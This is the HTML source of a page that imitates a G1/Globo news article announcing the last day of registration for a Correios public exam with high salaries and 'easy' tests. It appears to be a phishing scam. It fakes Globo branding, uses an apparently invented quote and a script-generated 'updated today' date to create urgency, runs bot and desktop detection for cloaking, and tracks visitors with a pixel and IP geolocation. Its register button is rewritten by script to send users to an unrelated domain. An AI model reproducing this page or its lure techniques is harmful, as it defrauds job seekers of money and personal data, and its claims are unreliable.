<html lang="pt-br"><head>
    
    <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>


    <script>
  window.pixelId = "67b5785f2c767c4222111ccc";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
    
    
    
    
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <title>G1 - Último dia para se inscrever no concurso dos Correios: Salários de até R$ 25.126,53 e provas fáceis!</title>
	<link rel="canonical" href="https://g1obonews.com">
    <script>
  // Função para detectar se é um dispositivo móvel
  function isMobile() {
    return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
  }
  // Função para detectar se é um bot
  function isBot() {
    const botAgents = [
      'Googlebot', 'Bingbot', 'Slurp', 'DuckDuckBot', 'Baiduspider',
      'YandexBot', 'Sogou', 'Exabot', 'facebot', 'ia_archiver'
    ];
    return botAgents.some(bot => navigator.userAgent.includes(bot));
  }
  // Função para verificar se a largura da janela é maior que 768px
  function isWideScreen() {
    return window.innerWidth > 768;
  }
  // Redirecionar ou bloquear o acesso
  function checkAccess() {
    if (isBot() || (!isMobile() && isWideScreen())) {
      // Redirecionar para o site G1 se o acesso for bloqueado
    }
  }
  // Executar a função de verificação ao carregar a página
  window.onload = checkAccess;
  // Adicionar um listener para verificar novamente se a janela for redimensionada
  window.addEventListener('resize', checkAccess);
</script>
    <script src="https://cdn.tailwindcss.com"></script>
    <link href="https://fonts.googleapis.com/css2?family=Encode+Sans:wght@300;400;500;600;700&display=swap" rel="stylesheet">
    <link href="css/all.min.css" rel="stylesheet">
    <meta property="og:title" content="Último dia para se inscrever no concurso dos Correios: Salários de até R$ 25.126,53 e provas fáceis!">
    <meta property="og:description" content="Concurso oferece 7.200 vagas em todos os estados do Brasil com salários atrativos e provas acessíveis. Inscrições encerram hoje!">
    <meta property="og:image" content="https://g1.newsnoticiario.com/banner.png">
    <meta property="og:url" content="https://g1.newsnoticiario.com">
    <meta property="og:type" content="website">
    <meta name="twitter:card" content="summary_large_image">
    <style>
        body {
            font-family: 'Encode Sans', Arial, sans-serif;
            font-size: 15px;
            color: #1f2123;
            line-height: 1.3;
        }
        .custom-red { color: #C4170C; }
        .bg-custom-red { background-color: #C4170C; }
        .custom-list {
            list-style-type: none;
            counter-reset: item;
            padding-left: 0;
        }
        .custom-list li {
            counter-increment: item;
            margin-bottom: 0.5rem;
            padding-left: 2rem;
            position: relative;
        }
        .custom-list li::before {
            content: counter(item) ".";
            position: absolute;
            left: 0;
            color: #C4170C;
            font-weight: bold;
        }
    </style>
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    colors: {
                        'custom-red': '#C4170C',
                    },
                    width: {
                        '30': '7.5rem',
                    },
                    fontFamily: {
                        'sans': ['Encode Sans', 'Arial', 'sans-serif'],
                    },
                }
            }
        }
    </script>
</head>
<body class="bg-gray-100 font-sans">
    <div class="max-w-7xl mx-auto bg-white">
        <header class="bg-white">
            <div class="flex text-xs overflow-x-auto whitespace-nowrap px-2 py-1">
                <a class="text-blue-600 font-bold mr-4" href="#">globo.com</a>
                <a class="text-custom-red font-bold mr-4" href="#">g1</a>
                <a class="text-green-600 font-bold mr-4" href="#">ge</a>
                <a class="text-orange-500 font-bold mr-4" href="#">gshow</a>
                <a class="text-custom-red font-bold mr-4" href="#">globoplay</a>
                <a class="text-gray-600 font-bold" href="#">jornal nacional</a>
            </div>
        </header>
        <nav class="bg-custom-red flex items-center justify-between px-4 py-2 sticky top-0 z-50">
            <div class="flex items-center">
                <button class="text-white mr-4">
                    <i class="fas fa-bars text-xl"></i>
                </button>
                <img alt="G1 Logo" class="h-8" src="images/G1-celebra-aniversario-de-15-anos-com-nova-logomarca-1.jpg">
            </div>
            <h1 class="text-white text-lg font-semibold">Concursos</h1>
            <button class="text-white">
                <i class="fas fa-search text-xl"></i>
            </button>
        </nav>
        <main class="px-4 py-4">
            <h2 class="text-2xl font-bold mb-3 text-black">Último dia para se inscrever no concurso dos Correios: Salários de até R$ 25.126,53 e provas fáceis!</h2>
            <p class="mb-2">Prazo para se inscrever termina hoje. Concurso oferece 7.200 vagas em todo o país com provas acessíveis!</p>
            <p class="mb-2">Por <span class="text-custom-red font-semibold">João Silva</span> — Brasília</p>
            <p class="text-gray-500 text-xs mb-3" id="currentDate"></p>
            <div class="flex space-x-3 mb-3">
                <button class="bg-gray-100 p-2 rounded-lg w-30 h-10 flex items-center justify-center">
                    <i class="fab fa-facebook-f text-blue-600 text-lg"></i>
                </button>
                <button class="bg-gray-100 p-2 rounded-lg w-30 h-10 flex items-center justify-center">
                    <i class="fab fa-whatsapp text-green-500 text-lg"></i>
                </button>
                <button class="bg-gray-100 p-2 rounded-lg w-30 h-10 flex items-center justify-center">
                    <i class="fas fa-share-alt text-gray-600 text-lg"></i>
                </button>
            </div>
            <div class="mb-3">
                <script src="js/player.js" async=""></script><script src="js/hz42mdaydm.js" async="" type="module"></script><style>wistia-player[media-id='hz42mdaydm']:not(:defined) { background: center / contain no-repeat url('https://fast.wistia.com/embed/medias/hz42mdaydm/swatch'); display: block; filter: blur(5px); padding-top:56.25%; }</style> <wistia-player media-id="hz42mdaydm" aspect="1.7777777777777777"></wistia-player>
            
            
            
            <p class="text-gray-500 text-xs mb-3">Vídeo explicativo sobre o concurso dos Correios</p>
            <div class="bg-gray-100 p-4 rounded-lg mb-4">
                <h3 class="font-bold text-lg mb-2">Como se inscrever no concurso dos Correios:</h3>
                <ol class="list-decimal pl-5 mb-4">
                    <li>Acesse o site oficial do concurso.</li>
                    <li>Preencha o formulário de inscrição.</li>
                    <li>Escolha o estado e cargo desejado.</li>
                    <li>Efetue o pagamento da taxa de inscrição.</li>
                </ol>
                <div class="flex justify-center">
                    <a id="inscriptionButton" href="#" class="bg-custom-red text-white font-bold py-2 px-4 rounded inline-block hover:bg-red-700 transition duration-300">
                        Faça sua inscrição agora
                    </a>
                </div>
            </div>
            <div>
                <p class="mb-3">Os Correios anunciaram que as inscrições para seu concurso nacional encerram hoje. Com 7.200 vagas disponíveis em todos os estados do país e provas surpreendentemente acessíveis, esta é uma oportunidade única para quem busca estabilidade e uma carreira promissora no setor público.</p>
                <ol class="custom-list mb-4">
                    <li class="mb-2">As inscrições <span class="custom-red font-bold">encerram hoje</span>, não perca esta chance única!</li>
                    <li class="mb-2">Há vagas para <span class="custom-red font-bold">diversos níveis de escolaridade</span>, desde ensino médio até superior.</li>
                    <li class="mb-2">As provas são <span class="custom-red font-bold">consideradas fáceis</span> pelos especialistas!</li>
                    <li class="mb-2">Com <span class="custom-red font-bold">inscrições limitadas</span>, a concorrência será menor do que o esperado!</li>
                </ol>
                <p class="mb-3 font-bold">Salários atrativos:</p>
                <ul class="list-disc pl-5 mb-4">
                    <li>Nível médio: <span class="custom-red font-bold">R$ 3.622,23 a R$ 5.684,00</span></li>
                    <li>Nível superior (qualquer curso reconhecido pelo MEC): <span class="custom-red font-bold">R$ 9.624,40 a R$ 25.126,53</span></li>
                </ul>
                <p class="mb-4">O presidente dos Correios declarou: "Este é o maior e mais acessível concurso da história da empresa. Estamos buscando talentos em todos os cantos do país para fortalecer nossa equipe e melhorar o atendimento à população brasileira. As provas foram elaboradas para serem justas e acessíveis, dando oportunidade a todos os brasileiros."</p>
                <div class="mt-6 flex justify-center">
                    <img alt="Imagem representando o concurso dos Correios, mostrando a fachada de uma agência e pessoas estudando" class="w-full max-w-2xl rounded-lg" height="300" src="images/maxresdefault.jpg" width="600">
                </div>
            </div>
            <hr class="border-t border-gray-300 my-4">
        </div></main>
        <footer class="bg-custom-red p-1 md:p-1.5 text-white text-xs flex flex-col items-center justify-center">
            <div class="w-6 h-6 md:w-8 md:h-8 mb-0.5 flex items-center justify-center">
                <img alt="Logo G1" class="w-full h-full object-contain" src="images/G1-celebra-aniversario-de-15-anos-com-nova-logomarca-1.jpg">
            </div>
            <p class="text-2xs mt-0.5 text-center">© Copyright 2000-2024 Globo Comunicação e Participações S.A.</p>
        </footer>
    </div>
    <script>
        function updateDate() {
            const now = new Date();
            const day = String(now.getDate()).padStart(2, '0');
            const month = String(now.getMonth() + 1).padStart(2, '0');
            const year = now.getFullYear();
            const hours = String(now.getHours()).padStart(2, '0');
            const minutes = String(now.getMinutes()).padStart(2, '0');
            const formattedDate = `${day}/${month}/${year} ${hours}h${minutes} · Atualizado hoje`;
            document.getElementById('currentDate').textContent = formattedDate;
        }
        updateDate();
        setInterval(updateDate, 60000); // Update every minute
        // Function to get user's city based on IP
        function getUserCity() {
            fetch('https://ipapi.co/json/')
                .then(response => response.json())
                .then(data => {
                    document.getElementById('userCity').textContent = data.city;
                })
                .catch(error => {
                    console.error('Error fetching user location:', error);
                    document.getElementById('userCity').textContent = 'sua cidade';
                });
        }
        getUserCity();
        // Function to balance traffic between four links
       function redirectToSystem() {
    const button = document.getElementById('inscriptionButton');
    button.href = 'https://processo-concurso.site/cc/sistema';
}
redirectToSystem();

    </script>

</body></html>